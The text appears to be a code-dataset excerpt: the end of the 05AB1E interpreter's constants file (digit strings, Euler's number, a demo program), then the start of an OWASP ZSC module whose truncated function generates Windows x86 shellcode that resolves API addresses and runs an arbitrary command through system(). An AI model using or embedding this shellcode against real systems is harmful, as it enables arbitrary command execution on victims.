"21727372095510324225107971807783304260908679427342895573555925"\
"72380551144043800123904168771644518022649168164192740110645162"\
"43110170005669112173318942340054795968466980429801736257040673"\
"28212996215368488140410219446342464622074557564396045298531307"\
"40908460849965376780379320189914086581466217531933766597011433"\
"60862500982956691763884605676297293146491149370462446935198403"\
"53444913514119366793330193661766365255514917498230798707228086"\
"85962611266050428929696653565251668888557211227680277274370891"\
"38963977225756489053340103885593112567999151658902501648696142"\
"20700591605616615970245198905183296927893555030393468121976158"\
"18398048396056252309146263844738629603984892438618729850777592"\
"79272206855480721049781765328621018747676689724884113956034948"\
"37672703631692100735083407386526168450748249644859742813493648"\
"37242611670426687083192504099761531907685577032742178501000644"\
"98412420739640013960360158381056592841368457411910273642027416"\
"72348821452410134771652960312840865841978795111651152982781462"\
"37913985500639996032659124852530849369031313010079997719136223"\
"86601109992914287124938854161203802041134018888721969347790449"\
"52745428807280350930582875442075513481666092787935356652125562"\
"13998824962847872621443236285367650259145046837763528258765213"\
"15648097214192967554938437558260025316853635673137926247587804"\
"44594418342917275698837622626184636545274349766241113845130548"\
"44983631178978448973207671950878415861887969295581973325069995"\
"40260151167552975057543781024223895792578656212843273120220071"\
"73057406928686936393018676595825132649914595026091706934751940"\
"97535746401683081179884645247361895605647942635807056256328118"\
"26966302647953595109712765913623318086692153578860781275991053"\
"17140220450618607537486630635059148391646765672320571451688617"\
"79098469593223672494673758309960704258922048155079913275208858"\
"78111768521426933478692189524062265792104362034885292626798401"\
"95321645879115157905046057971083898337186403802441751134722647"\
"54701079479399695355466961972676325522991465493349966323418595"\
"45036098034409221220671256769872342794070885707047429317332918"\
"52389672197135392449242617864118863779096281448691786946817759"\
"71715066911148002075943201206196963779510322708902956608556222"\
"45260261046073613136886900928172106819861855378098201847115416"\
"63032626569928342415502360097804641710852553761272890533504550"\
"13568414377585442967797701466029438768722511536380119175815402"\
"12081825560648541078793359892106442724489861896162941341800129"\
"13068363860929410008313667337215300835269623573717533073865333"\
"20484219030818644918409372394403340524490955455801640646076158"\
"01030176748847501766190869294609876920169120218168829104087070"\
"56095147041692114702741339005225334083481287035303102391969997"\
"59741390859360543359969707560446013424245368249609877258131102"\
"73279856207212657249900346829388687230489556225320446360263985"\
"22525841646432427161141981780248259556354490721922658386366266"\
"75083594431487763515614571074552801615967704844271419443518327"\
"69840755267792641126176525061596523545718795667317091331935876"\
"62825592078308018520689015150471334038610031005591481785211038"\
"75454293338918844412051794396997019411269511952656491959418997"\
"41839323464742429070271887522353439367363366320030723274703740"\
"12398256202466265197409019976245205619855762576000870817308328"\
"34438183107005451449354588542267857855191537229237955549433341"\
"17442016960009069641561273229777022121795186837635908225512881"\
"47002199234886404395915301846400471432118636062252701154112228"\
"80277853891109849020134274101412155976996543887719748537643115"\
"22983853312307175113296190455900793806427669581901484262799122"\
"79294798734890186847167650382732855205908298452980625925035212"\
"45192592798659350613296194679625237397256558415785374456755899"\
"03240549218696288849033256085145534439166022625777551291620077"\
"79685262938793753045418108072928589198971538179734349618723292"\
"61474785019261145041327487324297058340847111233374627461727462"\
"58241532427105932250625530231473875925172478732288149145591560"\
"03633457542423377916037495250249302235148196138116256391141561"\
"32684495807250827343176594405409826976526934457986347970974312"\
"49827193311386387315963636121862349726140955607992062831699942"\
"07205481152535339394607685001990988655386143349578165008996164"\
"07967814290114838764568217491407562376761845377514403147541120"\
"76016072646055685925779932207033733339891636950434669069482843"\
"62998003741452762771654762382554617088318981086880684785370553"\
"48046935095881802536052974079353867651119507937328208314626896"\
"07107517552061443378411454995013643244632819334638905093654571"\
"50690086448344018042836339051357815727397333453728426337217406"\
"77577107983051755572103679597690188995849413019599957301790124"\
"19390868135658553966194137179448763207986880037160730322054742"\
"57226689680188212342439188598416897227765219403249322731479366"\
"23400484897605903795809469604175427961378255378122394764614783"\
"92697654516229028170110043784603875654415173943396004891531881"\
"57665050095169740241564477129365661425394936888423051740012992"\
"55685428985389794266995677702708914651373689220610441548166215"\
"80421983847673087178759027920917590069527345668202651337311151"\
"00018143412096260165862982107666352336177400783778342370915264"\
"06305407180784335806107296110555002041513169637304684921335683"\
"26540030750982908936461204789111475303704989395283345782408281"\
"38644132271000296831194020332345642082647327623383029463937899"\
"37583655455991934086623509096796113400486702712317652666371077"\
"72511186035403755448741869351973365662177235922939677646325156"\
"02348757011379571209623772343137021203100496515211197601317641"\
"40820343734851285260291333491512508311980285017785571072537314"\
"13921570910513096505988599993156086365547740355189816673353588"\
"04821466509974143376118277772335191074121757284159258087259131"\
"07460602563490377726337391446137703802131834744730111303267029"\
"91733504770163210661622783002726928336558401179141944780874825"\
"36071440329625228577500980859960904093631263562132816207145340"\
"10422411208301000858726425211226248014264751942618432585338675"\
"87405474349107271004975428115946601713612259044015899160022982"\
"80179603519408004651353475269877760952783998436808690898919783"\
"69353217998013913544255271791022539701081063214304851137829149"\
"51138196914304349750018998068164441212327332830719282436240673"\
"19655469267785119315277511344646890550424811336143498460484905"\
"25834568326644152848971397237604032821266025351669391408204994"\
"32048602162775979177123475109750240307893575993771509502175169"\
"55582707253391189233407022383207758580213717477837877839101523"\
"13209848942345961369234049799827930414446316270721479611745697"\
"71968123929191374098292580556195520743424329598289898052923336"\
"41541925636738068949420147124134052507220406179435525255522500"\
"74879008656831454283516775054229480327478304405643858159195266"\
"75828292970522612762871104013480178722480178968405240792436058"\
"74246744307672164527031345135416764966890127478680101029513386"\
"69864974821211862904033769156857624069929637249309720162870720"\
"18983542369036414927023696193854737248032985504511208919287982"\
"87446786412915941753167560253343531062674525450711418148323988"\
"60729714023472552071349079839898235526872395090936566787899238"\
"71257897624875599044322889538837731734894112275707141095979004"\
"91930104674075041143538178246463079598955563899188477378134134"\
"07024674736211204898622699188851745625173251934135203811586335"\
"12391305444191007362844756751416105041097350585276204448919097"\
"90198431548528053398577784431393388399431044446566924455088594"\
"31408175122033139068159659251054685801313383815217641821043342"\
"78882611963044311138879625874609022613090084997543039577124323"\
"61690626291940392143974027089477766370248815549932245882597902"\
"63125743691094639325280624164247686849545532493801763937161563"\
"84785982371590238542126584061536722860713170267474013114526106"\
"76538339031592194346981760535838031061288785205154693363924108"\
"46763200956708971836749057816308515813816196688222204757043759"\
"61433804072585386208356517699842677452319582418268369827016023"\
"41493836349662935157685406139734274647089968561817016055110488"\
"97155485911861718966802597354170542398513556001872033507906094"\
"42127114399319604652742405088222535977348151913543857125325854"\
"49394601086579379805862014336607882521971780902581737087091646"\
"45272797715350991034073642502038638671822052287969445838765294"\
"95104866071739022932745542678566977686593992341683412227466301"\
"06215532050265534146099524935605085492175654913483095890653617"\
"69381763747364418337897422970070354520666317092960759198962773"\
"42309025239744386101426309868773391388251868431650102796491149"\
"73758288891345034114886594867021549210108432808078342808941729"\
"00898329753694064496990312539986391958160146899522088066228540"\
"41486427478628197554662927881462160717138188018084057208471586"\
"90683691939338186427845453795671927239797236465166759201105799"\
"66396259853551276355876814021340982901629687342985079247184605"\
"87482833138125916196247615690287590107273310329914062386460833"\
"37863825792630239159000355760903247728133888733917809696660146"\
"61503175422675112599331552967421333630022296490648093458200818"\
"06180210022766458040027821333675857301901137175467276305904435"\
"13131903609248909724642792845554991349000518029570708291905255"\
"78188991389962513866231938005361134622429461024895407240485712"\
"25662888893172211643294781619055486805494344103409068071608802"\
"22795968695013364381426825217047287086301013730115523686141690"\
"37567574763723976318575703810944339056456446852418302814810799"\
"37691851212720193504404180460472162693944578837709010597469321"\
"72055811407877598977207200968938224930323683051586265728111463"\
"99698313751793762321511125234973430524062210524423435373290565"\
"16340666950616589287821870775679417608071297378133518711793165"\
"03315552382248773065344417945341539520242444970341012087407218"\
"10938826816751204229940494817944947273289477011157413944122845"\
"52182842492224065875268917227278060711675404697300803703961878"\
"79669488255561467438439257011582954666135867867189766129731126"\
"20007297155361302750355616781776544228744211472988161480270524"\
"80681765357327557860250584708401320883793281600876908130049249"\
"47368251703538221961903901499952349538710599735114347829233949"\
"18793660869230137559636853237380670359114424326856151210940425"\
"58263930167801712866923928323105765885171402021119695706479981"\
"03150563304514156441462316376380990440281625691757648914256971"\
"16359843931743327023781233693804301289262637538266779503416933"\
"32360750024817574180875038847509493945489620974048544263563716"\
"99594992098088429479036366629752600324385635294584472894454716"\
"20929749549661687741412088213047702281611645604400723635158114"\
"72973921896673738264720472264222124201656015028497130633279581"\
"30251601369482556701478093579088965713492615816134690180696508"\
"55631012121849180584792272069187169631633004485802010286065785"\
"59126997463766174146393415956953955420331462802651895116793807"\
"57331575984608617370268786760294367778050024467339133243166988"\
"35407323238828184750105164133118953703648842269027047805274249"\
"60349208295475505400345716018407257453693814553117535421072655"\
"83561549987444748042732345788006187314934156604635297977945507"\
"35930479568720931672453654720838168585560604380197703076424608"\
"48987610134570939487700294617579206195254925575710903852517148"\
"52526567104534981341980339064152987634369542025608027761442191"\
"31892139390883454313176968510184010384447234894886952098194353"\
"90650655535461733581404554483788475252625394966586999205841765"\
"78012534103389646981864243003414679138061902805960785488801078"\
"70551694621522877309010446746249797999262712095168477956848258"\
"34140226647721084336243759374161053673404195473896419789542533"\
"03630186140095153476696147625565187382329246854735693580289601"\
"53679178730355315937836308224861517777054157757656175935851201"\
"69294311113886358215966761883032610416465171484697938542262168"\
"16140012237821377977413126897726671299202592201740877007695628"\
"47393220108815935628628192856357189338495885060385315817976067"\
"47984087836097596014973342057270460352179060564760328556927627"\
"49518220323614411258418242624771201203577638889597431823282787"\
"31460805353357449429762179678903456816988955351850447832561638"\
"70947695169908624710001974880920500952194363237871976487033922"\
"81154036347548862684595615975519376541011501406700122692747439"\
"88858994385973024541480106123590803627458528849356325158538438"\
"24249325266608758890831870070910023737710657698505643392885433"\
"65834259675065371500533351448990829388773735205145933304962653"\
"41514138612443793588507094468804548697535817021290849078734780"\
"81436632332281941582734567135644317153796781805819585246484008"\
"03290998194378171817730231700398973305049538735611626102399943"\
"25978012689343260558471027876490107092344388463401173555686590"\
"58524491937018104162620850429925869743581709813389404593447193"\
"49387762423240985283276226660494238512970945324558625210360082"\
"28664972417491914198896612955807677097959479530601311915901177"\
"94310420904907942444886851308684449370590902600612064942574471"\
"35354765785924270813041061854621988183009063458818703875585627"\
"91158737542106466795134648758677154383801852134828191581246259"\
"33516019893559516796893285220582479942103451271587716334522299"\
"41883968044883552975336128683722593539007920166694133909116875"\
"80398882886921600237325736158820716351627133281051818760210485"\
"18067552664867390890090719513805862673512431221569163790227732"\
"70541084203784152568328871804698795251307326634027851905941733"\
"92035854039567703561132935448258562828761061069822972142096199"\
"50933131217118789107876687204454887608941017479864713788246215"\
"95593333327556200943958043453791978228059039595992743691379377"\
"66494096404877784174833643268402628293240626008190808180439091"\
"55635193685606304508914228964521998779884934747772913279726602"\
"65840166789013649050874114212686196986204412696528298108704547"\
"86155954533802120115564697997678573892018624359932677768945406"\
"50821883822790983362716712449002676117849826437703300208184459"\
"00971723520433199470824209877151444975101705564302954282181967"\
"00920251561584417420593365814813490269311151709387226002645863"\
"56132560579256092733226557934628080568344392137368840565043430"\
"39657406101777937014142461549307074136080544210029560009566358"\
"97789926763051771878194370676149821756418659011616086540863539"\
"51303920131680576903417259645369235080641744656235152392905040"\
"47995318407486215121056183385456617665260639371365880252166622"\
"57613220194170137266496607325201077194793126528276330241380516"\
"90717456596485374835466919452358031530196916048099460681490403"\
"81982973236093008713576079862142542209641900436790547904993007"\
"37242158195453541837112936865843055384271762803527912882112930"\
"35157565659994474178843838156514843422985870424559243469329523"\
"82180350833372628379183021659183618155421715744846577842013432"\
"98259456688455826617197901218084948033244878725818377480552226"\
"15101137174536841787028027445244290547451823467491956418855124"\
"42133778352142386597992598820328708510933838682990657199461490"\
"29025742768603885051103263854454041918495886653854504057132362"\
"68106914681484786965916686184275679846004186876229805556296304"\
"95322792305161672159196867584952363529893578850774608153732145"\
"64298479231051167635774949462295256949766035947396243099534331"\
"40499420967788382700271447849406903707324910644415169605325656"\
"58677875741747211082743577431519406075798356362914332639781221"\
"94628744779811980722564671466405485013100965678631488009030374"\
"33887536418316513498254669467331611812336485439764932502617954"\
"35720430540218297487125110740401161140589991109306249231281311"\
"34054926257135672181862893278613883371802853505650359195274140"\
"86951092616754147679266803210923746708721360627833292238641361"\
"59412133927803611827632410600474097111104814000362334271451448"\
"33464167546635469973149475664342365949349684588455152415075637"\
"60508663282742479413606287604129064491382851945640264315322585"\
"62404314183866959063324506300039221319264762596269151090445769"\
"30144405461803785750303668621246227863975274666787012100339298"\
"87337501447560032210062235802934377495503203701273846816306102"\
"57030087227546296679688089058712767636106622572235222973920644"\
"09352432722810085997309513252863060110549791564479184500461804"\
"76240892892568091293059296064235702106152464620502324896659398"\
"32493396737695202399176089847457184353193664652912584806448019"\
"52016283879518949933675924148562613699594530728725453246329152"\
"11012876377060557060953137752775186792329213495524513308986796"\
"16512907384130216757323863757582008036357572800275449032795307"\
"90079944254110872569318801466793559583467643286887696661009739"\
"74996783659339784634695994895061049038364740950469522606385804"\
"75807306991229047408987916687211714752764471160440195271816950"\
"28973353714853092893704638442089329977112585684084660833993404"\
"68902678751600877546126798801546585652206121095349079670736553"\
"70257619943137663996060606110640695933082817187642604357342536"\
"75694378484849525010826648839515970049059838081210522111109194"\
"32395113605144645983421079905808209371646452312770402316007213"\
"54372346126726099787038565709199850759563461324846018840985019"\
"28768790226873455650051912154654406382925385127631766392205093"\
"34520430077301702994036261543400132276391091298832786392041230"\
"44555168405488980908077917463609243933491264116424009388074635"\
"60726233669584276458369826873481588196105857183576746200965052"\
"06592926354829149904576830721089324585707370166071739819448502"\
"84260396366074603118478622583105658087087030556759586134170074"\
"40296568763477417643105175103673286924555858208237203860178173"\
"40517513043799486882232004437804310317092103426167499800007301"\
"09481458637448877852227307633049538394434538277060876076354209"\
"44500830624763025357278103278346176697054428715531534001649707"\
"65719598504174819908720149087568603778359199471934335277294728"\
"53792578768483230110185936580071729118696761765505377503029303"\
"83070644891281141202550615089641100762382457448865518258105814"\
"34532012475472326908754750707857765973254284445935304499207001"\
"53874894822655644222369636554419422544133821222547749753549462"\
"82768053333698328415613869236344335855386847111143049824839899"\
"80316545863828935379913053522283343013795337295401625762322808"\
"13849949187614414132293376710656349252881452823950620902235787"\
"68465011666009738275366040544694165342223905210831458584703552"\
"35221992827276057482126606529138553034554974455147034493948686"\
"42945965843102419078592368022456076393678416627051855517870290"\
"07355730462063969245330779578224594971042018804300018388142900"\
"17303945050734278701312446686009277858181104091151172937487362"\
"88787490746528556543474888683106411005102302087510776891878152"\
"62273525155037953244485778727761700196485370355516765520911933"\
"34376286628461984402629525218367852236747510880978150709897841"\
"08624588152266096355140187449583692691779904712072649490573726"\
"28600521140358123107600669951853612486274675637589622529911649"\
"06687650826173417848478933729505673900787861792535144062104536"\
"25064046372881569823231750059626108092195521115085930295565496"\
"53886261297233991462835847604862762702730973920200143224870758"\
"33735491524608560821032888297418390647886992327369136004883743"\
"61522351705843770554521081551336126214291181561530175888257359"\
"89250710887926212864139244330938379733386780613179523731526677"\
"82085802470143352700924380326695174211950767088432634644274912"\
"55890774686358216216604274131517021245858605623363149316464691"\
"94656249747174195835421860774871105733845843368993964591374060"\
"38215935224359475162623918868530782282176398323730618020424656"\
"47752794310479618972429953302979249748168405289379104494700459"\
"86499187272734541350810198388186467360939257193051196864560185"\
"78245021823106588943798652243205067737996619695547244058592241"\
"95300682045179537004347245176289356677050849021310773662575169"\
"33552746230294303120359626095342357439724965921101065781782610"\
"74531887480318743082357369919515634095716270099244492974910548"\
"85151965866474014822510633536794973714251022934188258511737199"\
"49911509758374613010550506419772153192935487537119163026203032"\
"58865852848019350922587577559742527658401172134232364808402714"\
"35636754204637518255252494432965704386138786590196573880286840"\
"89408767281671413703366173265012057865391578070308871426151907"\
"00149257611292767519309672845397116021360630309054224396632067"\
"32358279788933232440577919927848463333977773765590187057480682"\
"67834796562414610289950848739969297075043275302997287229732793"\
"44298864641272534816060377970729829917302929630869580199631241"\
"30493935049332541235507105446118259114111645453471032988104784"\
"06778013807713146540009938630648126661433085820681139583831916"\
"54555825942689576984142889374346708410794631893253910696395578"\
"70602124597489829356461356078898347241997947856436204209461341"\
"38761319886535235831299686226894860840845665560687695450127448"\
"63140505473535174687300980632278046891224682146080672762770840"\
"40226615548502400895289165711761743902033758487784291128962324"\
"05919187469104200584832614067733375102719565399469716251724831"\
"23063391932870798380074848572651612343493327335666447335855643"\
"23528088392434827876088616494328939916639921048830784777704804"\
"72849145630335326507002958890626591549850940797276756712979501"\
"09822947622896189159144152003228387877348513097908101912926722"\
"10377889805396415636236416915498576840839846886168437540706512"\
"03906250612810766379904790887967477806973847317047525344215639"\
"38720123880632368803701794930895490077633152306354837425681665"\
"36160664198003018828712376748189833024683637148830925928337590"\
"27894258806008728603885916884973069394802051122176635913825152"\
"27867009440694235512020156837777885182467002565170850924962374"\
"72681369428435006293881442998790530105621737545918267997321773"\
"02936892806521002539626880749809264345801165571588670044350397"\
"50532347828732736884086354000274067678382196352222653929093980"\
"36739136408289872201777674716811819585613372158311905468293608"\
"23697611345028175783020293484598292500089568263027126329586629"\
"14765314223335179309338795135709534637718368409244442209631933"\
"29562030557551734006797374061416210792363342380564685009203716"\
"15264255637185388957141641977238742261059666739699717316816941"\
"43509528319355641770566862221521799115135563970714331289365755"\
"84464832620120642433801695586269856102246064606933079384785881"\
"36740700059976970364901927332882613532936311240365069865216063"\
"98725026723808740339674439783025829689425689674186433613497947"\
"24552629142652284241924308338810358005378702399954217211368655"\
"27534136221169314069466951318692810257479598560514500502171591"\
"31775160995786555198188619321128211070944228724044248115340605"\
"89595835581523201218460582056359269930347885113206862662758877"\
"44603599665610843072569650056306448918759946659677284717153957"\
"61210818084154727314266174893313417463266235422207260014601270"\
"20693463952056444554329166298666078308906811879009081529506362"\
"78207561438881578135113469536630387841209234694286873083932043"\
"33387277549680521030282154432472338884521534372725012858974769"\
"46080831440412586818154004918777228786980185345453700652665564"\
"17091542952275670922221747411206272065662298980603289167206874"\
"65494824610869736722554740481288924247185432360575341167285075"\
"55205713115669795458488739874222813588798584078313506054829055"\
"48278529489112190538319562422871948475940785939804790109419407"\
"67176443903273071213588738504999363883820550168340277749607027"\
"84488028191222063688863681104356952930065219552826152699127163"\
"27738841899328713056346468822739828876319864570983630891778648"\
"08667618548568004767255267541474285102814580740315299219781455"\
"75684368111018531749816701642664788409026268282444825802753209"\
"54991510451851771654631180490456798571325752811791365627815811"\
"28881656228587603087597496384943527567661216895926148503078536"\
"04527450775295063101248034180458405943292607985443562009370809"\
"82152392037179067812199228049606973823874331262673030679594396"\
"95495718957721791559730058869364684557667609245090608820221223"\
"71925453671519183487258742391941089044411595993276004450655620"\
"46116465566548759424736925233695599303035509581762617623184956"\
"90649483967300203776387436934399982943020914707361894793269276"\
"44518656023955905370512897816345542332011497599489627842432748"\
"78803270141867695262118097500640514975588965029300486760520801"\
"49153788541390942453169171998762894127722112946456829486028149"\
"18156024967788794981377721622935943781100444806079767242927624"\
"51078415344642915084276452000204276947069804177583220909702029"\
"65734725158290463091035903784297757265172087724474095226716630"\
"00546971638794317119687348468873818665675127929857501636341131"\
"62753049901913564682380432997069577015078933772865803571279091"\
"76742080565549362541"
# Euler's number e (base of the natural logarithm) to several thousand
# decimal places, kept as a string so the full precision survives; the
# trailing backslashes splice the adjacent 63-character string literals
# into one long literal.  Do not reflow these lines.
constant_e = "2.7182818284590452353602874713526624977572470936999595749669676"\
"772407663035354759457138217852516642742746639193200305992181741"\
"596629043572900334295260595630738132328627943490763233829880753"\
"952510190115738341879307021540891499348841675092447614606680822"\
"480016847741185374234544243710753907774499206955170276183860626"\
"331384583000752044933826560297606737113200709328709127443747047"\
"306969772093101416928368190255151086574637721112523897844250569"\
"369677078544996996794686445490598793163688923009879312773617821"\
"424999229576351482208269895193668033182528869398496465105820939"\
"398294887933203625094431173012381970684161403970198376793206832"\
"237646480429531180232878250981945581530175671736133206981125099"\
"181881593041690351598888519345807273866738589422879228499892086"\
"058257492796104841984443634632449684875602336248270419786232090"\
"216099023530436994184914631409343173814364054625315209618369088"\
"707016768396424378140592714563549061303107208510383750510115747"\
"041718986106873969655212671546889570350354021234078498193343210"\
"817012100562788023519303322474501585390473041995777709350366041"\
"997329725088687696640355570716226844716256079882651787134195124"\
"652010305921236677194325278675398558944896970964097545918569563"\
"023637016211204774272283648961342251644507818244235294863637214"\
"740238893441247963574370263755294448337998016125492278509257782"\
"620926226483262779333865664816277251640191059004916449982893150"\
"660472580277863186415519565324425869829469593080191529872117255"\
"347546396447910145904090586298496791287406870504895858671747985"\
"667757573205681288459205413340539220001137863009455606881667400"\
"698420558040336379537645203040243225661352783695117788386387443"\
"662532249850654995886234281899707733276171783928034946501434558"\
"970719425863987727547109629537415211151368350627526023264847287"\
"392076431005958411661205452970302364725492966693811513732275364"\
"098889031360205724817658511806303644281231496550704751025446501"\
"727211555194866850800368532281831521960037356252794495158284188"\
"947876108526398139559900673764829224437528718462457803619298197"\
"399147564488262603903381441823262515097482798777996437308997038"\
"867782271383605772978824125611907176639465070633045279546618550"\
"666618566470971134447401607046262156807174818778443714369882185"\
"967095910259686200235371858874856965220005031173439207321139080"\
"293634479727355955277349071783793421637012050054513263835440001"\
"632399149070547977805669785335804896690629511943247309958765523"\
"812859041383241160722602998330535370876138939639177957454016137"\
"236187893652605381558415871869255386061647798340254351284396129"\
"603529133259427949043372990857315802909586313826832914771163963"\
"709240031689458636060645845925126994655724839186564209752685082"\
"075442545993769170419777800853627309417101634349076964237222943"\
"236612557250881477922315197477806056967253801718077636034624592"\
"877846585065605078084421152969752189087401966090665180351650179"\
"504619501366585436632712549639908549144200014574760819302212066"\
"243300964127048943903971771951806990869986066365832322787093765"\
"226014929101151717763594460202324930028040186772391028809786660"\
"651183260043688508817157238669842242201024950551881694803221002"\
"154264946398128736776589276881635983124778865201411741109136011"\
"499507662907794364600585194199856016264790761532103872755712699"\
"518275687989302761761146162549356495903798045838182323368612016"\
"437365698467037858533052758333379399075216606923805336988795651"\
"728559388349989470741618155012539706464817194670834819721448889"\
"790676503795903669672494992545279033729636162658976039498576741"\
"973594410237443297093554779826296145914429364514286171585873397"\
"679189757121195618738578364475844842355558105002561149239151889"\
"099463428413936080383091662818811503715284967059741625628236092"\
"680751501777253874025642534708790891372917228286115159156837252"\
"163077225440633787593105982676094420326192428531701878177296023"\
"413060672136046000389661093647095141417185777014180606443636815"\
"644400533160877831431744408119494229755993140118886833148328027"\
"655383300469329011574414756313999722170380461709289457909627166"\
"260740718749975359212756084414737823303270330168237193648002173"\
"857349359475643341299430248502357322145978432826414216848787216"\
"336701061509424345698440187331281010794512722373788612605816566"\
"053714396127888732527373890392890506865324138062796025930387727"\
"977837928684093253658807339884572187460210053114833513238500478"\
"716937621800490479559795929059165547050577751430817511269898518"\
"408718564026035305583737832422924185625644255022672155980274012"\
"179719280471396006891638286652770097527670697770364392602243728"\
"184088325184877047263844037953016690546593746161932384036389313"\
"364327137688841026811219891275223056256756254701725086349765367"\
"886059667527408686274079128565769963137897530346606166698042182"\
"772456053066077389962421834085988207186468262321508028828635974"\
"839654358856685503773131296587975810501214916207656769950659715"\
"447634703208532156036748286083786568030730626576334697742956346"\
"371670939719306087696349532884683361303882943104080029687386911"\
"066666146800015121143442256023874474325250769387077775193299942"\
"372772112588436087158348356269616619805725266122067975406210620"\
"064988291845439530152998209250300549825704339055357016865312052"\
"495614857249257386206917403695213533732531666345466588597286659"\
"511364413703313936721185695539521084584072443238355860631068069"\
"492485123263269951460359603729725319836842336390463213671011619"\
"821711150282801604488058802382031981493096369596735832742024988"\
"456849412738605664913525267060462344505492275811517093149218795"\
"271800194096886698683703730220047531433818109270803001720593553"\
"520700706072233999463990571311587099635777359027196285061146514"\
"375262095653467132900259943976631145459026858989791158370934193"\
"044115512192011716488056694593813118384376562062784631049034629"\
"950029458341164824114969758326011800731699437393506966295712410"\
"732391387417549230718624545432220395527352952402459038057445028"\
"224688628533654221381572213116328811205214648980518009202471939"\
"710555390113943316681515828843687606961102505171007392762385553"\
"862725535388309606716446623709226468096712540618695021431762116"\
"814009759528149390722260111268115310838731761732323526360583817"\
"151034595736538223534992935822836851007810884634349983518404451"\
"042701893819942434100905753762577675711180900881641833192019626"\
"341628816652137471732547772778348877436651882875215668571950637"\
"936565390389449366421764003121527870222366463635755503565576948"\
"865495002708539236171055021311474137441061344455441921013361729"\
"628569489919336918472947858072915608851039678195942983318648075"\
"083679551496636448965592948187851784038773326247051945050419847"\
"420141839477312028158868457072905440575106012852580565947030468"\
"634459265255213700806875200959345360731622611872817392807462309"\
"685367823106097921599360019946237993434210687813497346959246469"\
"525062469586169091785739765951993929939955675427146549104568607"\
"209901260681870498417807917392407194599632306025470790177452751"\
"186809982284730860766536866855516467702911336827563107223346726"\
"137054907953658345386371962358563126183871567741187385277229225"\
"474337378569553845624680101390572787101651296663676445187246565"\
"730402443684140814488732957847348490003019477888020460324660842"\
"753518483649591950828883232065221281041904480472479492913422849"\
"197002260131043006241071797150279343326340799596053144605323048"\
"528972917659876016667811937932372453857209607582277178483361613"\
"826128962261181294559274627671377944875867536575448614076119311"\
"595851265575973457301533364263076798544338576171533346232527057"\
"005303988289499034259566232975782488735029259166825894456894655"\
"926584547626945287805165017206747854178879822768065366506419109"\
"343452887833862172615626958265447820567298775642632532159429441"\
"039943217000090542650763095588465895171709147607437136893319469"\
"909819045012903070995662266203031826493657336984195557769637876"\
"491885286568660760056602560544571133728684020557441603083705231"\
"242587223438854123179481388550075689381124935386318635287083799"\
"456926199817945233640874295911807474534195514203517261842008455"\
"917084568236820089773945584267921427347756087964427920270831215"\
"156406341341617166448069815483764491573900121217041547872591998"\
"438253649505147713793991472052195290793961376211072384942906163"\
"760459623125350606853765142311534966568371511660422079639446662"\
"163255157729070978473156278277598788136491951257483328793771571"\
"590910648416426783099497236744201758622694021594079244805412553"\
"043131799269673915754241929660731239376354213923061787675395871"\
"436104089409966089471418340698362993675362621545247298464213752"\
"910798843813060955526227208375186298370667872244301957937937860"\
"210725427728907173285487437435578196651171661833088112912024520"\
"048682200072344035025448202834254187884653602591506445271657700"\
"445210977355858976226554849416217149895323834216001140629507184"\
"042778925855274303522139683567901807640604213830730877446017084"\
"688272261177180842664333651780002171903449234264266292261456004"\
"373838683355553434530042648184739892156270860956506293404052649"\
"324426144566592129122564889356965500915430642613425266847259491"\
"314239398845432486327461842846655985332312210466259890141712103"\
"460842716166190012571958707932175696985440133976220967494541854"\
"711844643394699016269835160784892451405894094639526780735457970"\
"307051163682519487701189764002827648414160587206184185297189154"\
"196882532893091496653457535714273184820163846448324990378860690"\
"807270932767312758196656394114896171683298045513972950668760474"\
"915420428429993541025829113502241690769431668574242522509026939"\
"348148564513030699251995904363840284292674125734224477655841778"\
"617173726546208549829449894678735092958165263207225899236876845"\
"017823038096567883112289305809140572610865884845873101658151167"\
"333276748870148291674197015125597825727074064318086014281490241"\
"678047232759768426963393577354293018673943971638861176420900406"\
"663398856841681003872389214483176070116684503887212364367043314"\
"911557332801829779887365909166596124020217785588548761761619893"\
"079438005666336488436508914480557103976521469602766258359905198"\
"04230017946553679"
# Sample 05AB1E program shipped as a demo.  Per its own embedded quoted
# comments: with empty input it opens docs/info.txt relative to the
# interpreter file and prints it as a quick reference; with non-empty
# input it draws a "snake" on the canvas (.Λ).  The text below is raw
# 05AB1E source — every character (including the non-ASCII tokens and
# trailing backslashes) is significant, so it must not be reformatted.
zero_byte_code = """Ig0Q "check if the input is not empty"\\
"If the input is empty, read the docs file and print as a quick-ref
------------------------------------------------------------------"\\
i “curr=__file__;curr=curr[:-9]+"docs/info.txt";f=open(curr, "r");print(f.read())“.e q }}}}}}}
"If the input is not empty, do random stuff with it
--------------------------------------------------"\\
¹d©
"1: Create a snake using the canvas
-------------------------------"\\
i
"Not sure what to do now with the input, so I'll just make a snake:",¶?¶?
6¹×S'#4202.Λ,
}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}
®_i
"Not sure what to do now with the input, so I'll just make a snake:",¶?¶?
5¹g×S¹2464.Λ,
}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}"""
| Emigna/05AB1E | lib/constants.py | Python | mit | 146,313 | 0.000055 |
#!/usr/bin/env python
'''
OWASP ZSC
https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project
https://github.com/zscproject/OWASP-ZSC
http://api.z3r0d4y.com/
https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ]
'''
from core import stack
def create_file(create_command):
    """Return Windows x86 shellcode (AT&T syntax) that runs a command.

    The emitted assembly resolves GetProcAddress by walking the loader
    data at %fs:0x30 (PEB) and scanning the first module's export table
    for the 'GetP','rocA','ddre' name prefix (the cmpl immediates below
    are those ASCII words, little-endian).  It then resolves LoadLibraryA
    ('Libr','aryA'), loads msvcrt.dll ('msvc','rt.d','ll'), calls
    system() ('syst','em') on the command placed on the stack by
    *create_command*, and finally calls exit() ('exit').

    create_command -- assembly snippet (typically a series of push
                      instructions built by core.stack) that puts the
                      NUL-terminated command string on the stack; it is
                      substituted at the {cmd} marker.
    """
    # The template is emitted verbatim apart from the {cmd} substitution,
    # so the surrounding instructions must stay byte-exact.
    template = '''
xor %ecx,%ecx
mov %fs:0x30(%ecx),%eax
mov 0xc(%eax),%eax
mov 0x14(%eax),%esi
lods %ds:(%esi),%eax
xchg %eax,%esi
lods %ds:(%esi),%eax
mov 0x10(%eax),%ebx
mov 0x3c(%ebx),%edx
add %ebx,%edx
mov 0x78(%edx),%edx
add %ebx,%edx
mov 0x20(%edx),%esi
add %ebx,%esi
xor %ecx,%ecx
inc %ecx
lods %ds:(%esi),%eax
add %ebx,%eax
cmpl $0x50746547,(%eax)
jne 23 <.text+0x23>
